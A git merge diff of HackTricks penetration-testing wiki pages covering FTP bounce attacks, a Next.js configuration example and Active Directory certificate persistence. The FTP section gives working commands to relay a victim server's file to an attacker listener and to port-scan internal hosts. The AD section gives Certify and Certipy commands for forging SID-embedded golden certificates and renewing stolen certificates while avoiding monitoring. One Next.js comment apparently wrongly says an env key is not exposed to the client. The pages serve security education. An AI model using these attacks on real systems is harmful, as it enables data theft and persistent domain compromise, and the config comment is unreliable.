Merge branch 'master' of github.com:HackTricks-wiki/hacktricks

carlospolop · carlospolop · commit 570a93dc5dec · 2026-02-12T14:19:17.000+01:00
diff --git a/src/network-services-pentesting/pentesting-ftp/ftp-bounce-download-2oftp-file.md b/src/network-services-pentesting/pentesting-ftp/ftp-bounce-download-2oftp-file.md
@@ -5,29 +5,98 @@
 
 ## Resume
 
-If you have access to a bounce FTP server, you can make it request files of other FTP server \(where you know some credentials\) and download that file to your own server.
+If you have access to a **bounce FTP server**, you can make it request files of **another FTP server** (where you know some credentials) and download that file to **your own server**.
 
 ## Requirements
 
-- FTP valid credentials in the FTP Middle server
-- FTP valid credentials in Victim FTP server
-- Both server accepts the PORT command \(bounce FTP attack\)
-- You can write inside some directory of the FRP Middle server
-- The middle server will have more access inside the Victim FTP Server than you for some reason \(this is what you are going to exploit\)
+- FTP valid credentials in the **FTP Middle server**
+- FTP valid credentials in **Victim FTP server**
+- Both servers **accept the `PORT` command** (bounce FTP attack)
+- You can **write** inside some directory of the **FTP Middle server**
+- The middle server has **more access** inside the Victim FTP Server than you
 
 ## Steps
 
-1. Connect to your own FTP server and make the connection passive \(pasv command\) to make it listen in a directory where the victim service will send the file
-2. Make the file that is going to send the FTP Middle server t the Victim server \(the exploit\). This file will be a plaint text of the needed commands to authenticate against the Victim server, change the directory and download a file to your own server.
-3. Connect to the FTP Middle Server and upload de previous file
-4. Make the FTP Middle server establish a connection with the victim server and send the exploit file
-5. Capture the file in your own FTP server
-6. Delete the exploit file from the FTP Middle server
+1. Connect to **your own FTP server** and make the connection passive (`pasv` command) so it **listens** in a directory where the victim service will send the file.
+2. Craft the file the FTP Middle server will send to the Victim server (the **exploit script**). This file will be plain text with the needed commands to authenticate against the Victim server, change the directory and download a file to your own server.
+3. Connect to the **FTP Middle Server** and upload the previous file.
+4. Make the FTP Middle server **establish a connection** with the Victim server and send the exploit file.
+5. **Capture** the file in your own FTP server.
+6. **Delete** the exploit file from the FTP Middle server.
 
-For a more detailed information check the post: [http://www.ouah.org/ftpbounce.html](http://www.ouah.org/ftpbounce.html)
+## Quick check for vulnerable bounce hosts
 
+- **Nmap** still supports FTP bounce checks. Example to verify a potential middle server:
 
-{{#include ../../banners/hacktricks-training.md}}
+```bash
+nmap -Pn -p21 --script ftp-bounce <middle_ftp_ip>
+# or directly attempt a bounce scan
+nmap -Pn -p80 -b user:pass@<middle_ftp_ip>:21 <internal_target_ip>
+```
+
+If the server refuses third‑party `PORT` values the scan will fail; some **embedded/legacy printers, NAS and appliance FTP daemons** still allow it.
+
+## Automating the 2nd FTP download
+
+Below is a modernized way to pull a file through a vulnerable middle FTP server.
+
+1. **Open a passive listener** on your attack box (any TCP sink works):
+   ```bash
+   nc -lvnp 2121 > loot.bin  # or run a small pyftpdlib server
+   ```
+
+2. **Note** your IP as `A,B,C,D` and port `P` as `p1,p2` (`p1 = P/256`, `p2 = P%256`).
+
+3. **Build the instruction file** that the middle server will replay to the victim:
+   ```bash
+   cat > instrs <<'EOF'
+   USER <victim_user>
+   PASS <victim_pass>
+   CWD /path/inside/victim
+   TYPE I
+   PORT A,B,C,D,p1,p2
+   RETR secret.tar.gz
+   QUIT
+   EOF
+   # Add padding so the control channel stays open on picky daemons
+   dd if=/dev/zero bs=1024 count=60 >> instrs
+   ```
+
+4. **Upload & trigger from the middle server** (classic proxy FTP):
+   ```bash
+   ftp -n <middle_ftp> <<'EOF'
+   user <middle_user> <middle_pass>
+   put instrs
+   PORT <victim_ip_with_commas>,0,21
+   RETR instrs
+   QUIT
+   EOF
+   ```
 
+5. **Grab the file** from your listener (`loot.bin`).
+6. **Clean up** the uploaded `instrs` file on the middle server.
 
+Notes:
+- Padding (`dd ...`) prevents the control connection from closing before the RETR finishes (large TCP window issue discussed in classic writeups).
+- Any service that can **listen and dump TCP** can replace the FTP PASV socket (e.g., `socat -u TCP-LISTEN:2121,fork - > loot.bin`).
+- If the middle server restricts privileged ports, use a high port in `PORT` and adjust your listener accordingly.
 
+## Extra tricks
+
+- Use a bounceable FTP server to **port-scan internal hosts** when file relay is blocked:
+  ```bash
+  nmap -Pn -p22,80,445 -b anonymous:<email>@<middle_ftp> <internal_ip>
+  ```
+- Some modern WAF/IDS (e.g., Juniper IPS) ship signatures specifically for **FTP:EXPLOIT:BOUNCE-ATTACK**; noisy payloads or missing padding may trip them.
+- When the middle server enforces "PORT to same host" restrictions, place your **listener on the middle server itself** (if you have write/execute) and forward the captured file later.
+
+For a more detailed old-school walkthrough check: [http://www.ouah.org/ftpbounce.html](http://www.ouah.org/ftpbounce.html)
+
+
+
+
+## References
+
+- [Nmap book – TCP FTP Bounce Scan (-b)](https://nmap.org/book/scan-methods-ftp-bounce-scan.html)
+- [CPTS Attacking Common Services – FTP Bounce example (2025)](https://www.chaostudy.com/2025/02/24/cpts-attacking-common-services/)
+{{#include ../../banners/hacktricks-training.md}}
diff --git a/src/network-services-pentesting/pentesting-web/nextjs.md b/src/network-services-pentesting/pentesting-web/nextjs.md
@@ -1015,8 +1015,8 @@ Manage sensitive information like API keys and database credentials securely wit
 
 module.exports = {
   env: {
-    SECRET_API_KEY: process.env.SECRET_API_KEY, // Exposed to the client
-    NEXT_PUBLIC_API_URL: process.env.NEXT_PUBLIC_API_URL, // Correctly prefixed for client
+    SECRET_API_KEY: process.env.SECRET_API_KEY, // Not exposed to the client
+    NEXT_PUBLIC_API_URL: process.env.NEXT_PUBLIC_API_URL, // Correctly prefixed for exposure to client
   },
 }
 ```
diff --git a/src/windows-hardening/active-directory-methodology/ad-certificates/domain-persistence.md b/src/windows-hardening/active-directory-methodology/ad-certificates/domain-persistence.md
@@ -63,10 +63,26 @@ Set-ADUser -Identity 'victim' -Add @{altSecurityIdentities=$Map}
 ```
 
 Notes
-- If you can craft forged certificates that include the SID security extension, those will map implicitly even under Full Enforcement. Otherwise, prefer explicit strong mappings. See 
-[account-persistence](account-persistence.md) for more on explicit mappings.
+- If you can craft forged certificates that include the SID security extension, those will map implicitly even under Full Enforcement. Otherwise, prefer explicit strong mappings. See [account-persistence](account-persistence.md) for more on explicit mappings.
 - Revocation does not help defenders here: forged certificates are unknown to the CA database and thus cannot be revoked.
 
+#### Full-Enforcement compatible forging (SID-aware)
+
+Updated tooling lets you embed the SID directly, keeping golden certificates usable even when DCs reject weak mappings:
+
+```bash
+# Certify 2.0 integrates ForgeCert and can embed SID
+Certify.exe forge --ca-pfx CORP-DC-CA.pfx --ca-pass Password123! \
+  --upn administrator@corp.local --sid S-1-5-21-1111111111-2222222222-3333333333-500 \
+  --outfile administrator_sid.pfx
+
+# Certipy also supports SID in forged certs
+certipy forge -ca-pfx CORP-DC-CA.pfx -upn administrator@corp.local \
+  -sid S-1-5-21-1111111111-2222222222-3333333333-500 -out administrator_sid.pfx
+```
+
+By embedding the SID you avoid having to touch `altSecurityIdentities`, which may be monitored, while still satisfying strong mapping checks.
+
 ## Trusting Rogue CA Certificates - DPERSIST2
 
 The `NTAuthCertificates` object is defined to contain one or more **CA certificates** within its `cacertificate` attribute, which Active Directory (AD) utilizes. The verification process by the **domain controller** involves checking the `NTAuthCertificates` object for an entry matching the **CA specified** in the Issuer field of the authenticating **certificate**. Authentication proceeds if a match is found.
@@ -110,12 +126,27 @@ Practical knobs attackers may set for long-term domain persistence (see {{#ref}}
 > [!TIP]
 > In hardened environments after KB5014754, pairing these misconfigurations with explicit strong mappings (`altSecurityIdentities`) ensures your issued or forged certificates remain usable even when DCs enforce strong mapping.
 
+### Certificate renewal abuse (ESC14) for persistence
+
+If you compromise an authentication-capable certificate (or an Enrollment Agent one), you can **renew it indefinitely** as long as the issuing template remains published and your CA still trusts the issuer chain. Renewal keeps the original identity bindings but extends validity, making eviction difficult unless the template is fixed or the CA is republished.
+
+```bash
+# Renew a stolen user cert to extend validity
+certipy req -ca CORP-DC-CA -template User -pfx stolen_user.pfx -renew -out user_renewed_2026.pfx
+
+# Renew an on-behalf-of cert issued via an Enrollment Agent
+certipy req -ca CORP-DC-CA -on-behalf-of 'CORP/victim' -pfx agent.pfx -renew -out victim_renewed.pfx
+```
+
+If domain controllers are in **Full Enforcement**, add `-sid <victim SID>` (or use a template that still includes the SID security extension) so the renewed leaf certificate continues to map strongly without touching `altSecurityIdentities`. Attackers with CA admin rights may also tweak `policy\RenewalValidityPeriodUnits` to lengthen renewed lifetimes before issuing themselves a cert.
 
 
 ## References
 
-- Microsoft KB5014754 – Certificate-based authentication changes on Windows domain controllers (enforcement timeline and strong mappings). https://support.microsoft.com/en-au/topic/kb5014754-certificate-based-authentication-changes-on-windows-domain-controllers-ad2c23b0-15d8-4340-a468-4d4f3b188f16
-- Certipy – Command Reference and forge/auth usage. https://github.com/ly4k/Certipy/wiki/08-%E2%80%90-Command-Reference
+- [Microsoft KB5014754 – Certificate-based authentication changes on Windows domain controllers (enforcement timeline and strong mappings)](https://support.microsoft.com/en-au/topic/kb5014754-certificate-based-authentication-changes-on-windows-domain-controllers-ad2c23b0-15d8-4340-a468-4d4f3b188f16)
+- [Certipy – Command Reference and forge/auth usage](https://github.com/ly4k/Certipy/wiki/08-%E2%80%90-Command-Reference)
+- [SpecterOps – Certify 2.0 (integrated forge with SID support)](https://specterops.io/blog/2025/08/11/certify-2-0/)
+- [ESC14 renewal abuse overview](https://www.adcs-security.com/attacks/esc14)
 - [0xdf – HTB: Certificate (SeManageVolumePrivilege to exfil CA keys → Golden Certificate)](https://0xdf.gitlab.io/2025/10/04/htb-certificate.html)
 
 {{#include ../../../banners/hacktricks-training.md}}
